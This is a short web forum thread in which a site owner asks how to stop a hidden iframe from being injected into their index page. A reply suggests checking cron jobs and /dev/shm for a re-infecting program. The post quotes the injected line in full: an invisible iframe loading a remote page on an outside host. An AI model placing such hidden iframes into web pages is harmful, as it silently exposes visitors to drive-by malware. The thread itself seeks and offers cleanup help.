SitePoint Sponsor

User Tag List

Results 1 to 2 of 2

Thread: code injection

  1. #1
    SitePoint Zealot dizyn's Avatar
    Join Date
    Apr 2006
    Posts
    181
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    code injection

    some how following code gets inject to my index page. what should I do to stop it?


    <iframe src="http://u3w.ru:8080/index.php" width=123 height=130 style="visibility: hidden"></iframe>
    i have 4 subdomain and problem is on the index page only rest of it is file

    thanks

  2. #2
    PHP Guru lampcms.com's Avatar
    Join Date
    Jan 2009
    Posts
    921
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Ask your admin to check cron entries. Usually a virus-like program creates a cron entry to check every 'n' minutes or hours and if it notices that you have removed that iframe from your page it will add it again. The contents (html to add) are usually hidden is some writable directory, often on the /dev/shm partition - the place where you would not expect to have any files or programs, but since /dev/shm is (must be) writable, a virus often uses it to store contents.

    But your first step should be to examine all cron entries. look in /etc/cron.daily and in /etc/cron.d


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •